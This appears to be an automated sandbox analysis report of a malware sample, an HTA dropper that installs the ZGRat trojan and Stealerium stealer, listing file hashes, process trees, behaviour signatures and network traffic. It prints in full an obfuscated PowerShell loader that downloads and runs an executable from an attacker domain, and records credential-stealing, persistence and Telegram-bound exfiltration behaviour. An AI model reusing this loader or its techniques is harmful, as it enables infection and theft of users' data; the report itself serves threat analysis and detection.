MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/4824-947-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-946-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/1540-945-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-944-0x0000000000400000-0x0000000000592000-memory.dmp

memory/1540-948-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-953-0x0000000006000000-0x0000000006008000-memory.dmp

memory/1540-952-0x0000000005FD0000-0x0000000005FF6000-memory.dmp

memory/1540-951-0x0000000005F40000-0x0000000005FD2000-memory.dmp

memory/1540-955-0x0000000006E30000-0x0000000006E38000-memory.dmp

memory/1540-956-0x0000000006E50000-0x0000000006E6E000-memory.dmp

memory/1540-954-0x0000000006E20000-0x0000000006E2A000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/1540-1012-0x0000000006F30000-0x0000000006FC2000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Process.txt

MD5 bf20b12d771f890a397436385c1bece5
SHA1 a4591d040c4a3cabf4d6273179cf498db097a3fd
SHA256 837fd30d574b109158bcba06387dbfad22c330f7742bb29c8f5c2e19d8f76e53
SHA512 0e490228e2982e1e61384288a98d8c66535374b40601400e8e5a9c0c26421d2bf61de7e432b838be032cbb04b478fce39270275bdff7c48a9e2fc4a64871f9b8

memory/1540-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1111-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1147-0x0000000007080000-0x00000000070FA000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 027a2c6780dfc5777707fc9fe796f5d6
SHA1 3add6e59894483c20d09b4dd8623fa42a252495e
SHA256 a19c1057e41ab8a3bc591f4d3ca2fb0a58f9fd34a300084580e14aa214fb3dc1
SHA512 fcede40cc3f6181b0c59849e966cf03324f305d6b38c05c21c8dacd5ac73a96178654871d39b903f0ffed6ae88ed5a9097a87e8d42544c621609c8767db245c4

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 906c700315ca80c7952b464f3f93723f
SHA1 a736b7cdea92db2e686737c4567b86c22ef66e3f
SHA256 c55a28b0b4773dad67a0ea894c080d2398a0e686f1c355cedb7f7291637476e5
SHA512 af133b667e92cdab4e352b4c86ea7e8986ea9de5e25e61da92a61abe59adb11435d1e44d7e54974c2969c046db1fe1b411186b1578c147829cbb2d5693ffe35c

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

memory/1540-1220-0x0000000007240000-0x00000000072F2000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Debug.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/1540-1222-0x00000000071D0000-0x00000000071F2000-memory.dmp

memory/1540-1223-0x0000000008930000-0x0000000008C84000-memory.dmp

memory/1540-1225-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\msgid.dat

MD5 13272090fc49070d4c79f78670b7839b
SHA1 4ea6e614dd113ed7bb5e291537ceed50154f5042
SHA256 bc91f49e63aa1e5f230c79de3f60aeae2b561531e263e0799efe03b3bb407c84
SHA512 27ffb2c8e2a1af82b4ca472eb1a17221ef73f957a79403cf575c749f82aadc57766191076f2da4eee02d4db5785f0d9180294fc3c32a4f98d5fa91549c1e5d4a

memory/1540-1237-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

memory/1540-1238-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Stealerium

stealer stealerium

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\xw.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1012 set thread context of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 3080 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3080 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 2812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 348 wrote to memory of 4464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;

C:\Users\Admin\AppData\Roaming\xw.exe

"C:\Users\Admin\AppData\Roaming\xw.exe"

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Roaming\xw.exe

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.95.31.18:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.28:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 162.159.134.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 152.199.19.74:80 tcp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
N/A 20.231.121.79:80 tcp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 151.80.29.83:443 tcp
US 8.8.8.8:53 udp
N/A 31.14.70.246:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
N/A 162.159.134.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp

Files

memory/4284-1-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/4284-2-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-3-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-0-0x0000000002B70000-0x0000000002BA6000-memory.dmp

memory/4284-4-0x0000000005840000-0x0000000005E68000-memory.dmp

memory/4284-5-0x00000000055F0000-0x0000000005612000-memory.dmp

memory/4284-6-0x0000000005790000-0x00000000057F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scy4e343.033.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4284-7-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/4284-17-0x0000000005FE0000-0x0000000006334000-memory.dmp

memory/4284-18-0x00000000064B0000-0x00000000064CE000-memory.dmp

memory/4284-19-0x00000000064F0000-0x000000000653C000-memory.dmp

memory/4284-20-0x0000000002BE0000-0x0000000002BF0000-memory.dmp

memory/4284-22-0x00000000069E0000-0x00000000069FA000-memory.dmp

memory/4284-23-0x0000000006A50000-0x0000000006A72000-memory.dmp

memory/4284-24-0x0000000007CC0000-0x0000000008264000-memory.dmp

memory/4284-21-0x0000000007670000-0x0000000007706000-memory.dmp

memory/4284-25-0x00000000088F0000-0x0000000008F6A000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 eef7a52c4e6fc20cd22306b007b9b4c0
SHA1 700f935a3e75a0001654fae0b4d30af5044329c0
SHA256 1e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444
SHA512 4459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 e6ccb03a4cd3aa39359361eae696ab9b
SHA1 ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3
SHA256 7cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba
SHA512 4e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd

memory/1012-37-0x0000000000A90000-0x0000000000A9E000-memory.dmp

memory/4284-42-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/1012-41-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/1012-40-0x00000000714D0000-0x0000000071C80000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 041d958d503620fcee33aab200c8e17a
SHA1 6e6b21612723294622356d6897968faa05439b81
SHA256 1f84a7ebd0887401a73b3152d38b4ac6dd5b5203189744a645ca59c3e3f4dbfb
SHA512 f6ce0c7d592b5dd8c47fc5eded575be3ac74bb5ad874dfef8091fdbbf957487a0e74be68f229dd2849ec82b7479ec539043cea05687525af0849cbd879dce181

memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp

memory/1012-44-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-45-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-47-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-49-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-51-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-53-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-55-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-57-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-59-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-61-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-65-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-63-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-67-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-69-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-71-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-73-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-75-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-77-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-79-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-81-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-83-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-85-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-87-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-89-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-91-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-93-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-95-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-97-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-99-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-101-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-103-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-105-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-107-0x0000000008140000-0x00000000086A3000-memory.dmp

memory/1012-976-0x0000000004D80000-0x0000000004D81000-memory.dmp

memory/1012-977-0x00000000089F0000-0x0000000008EF0000-memory.dmp

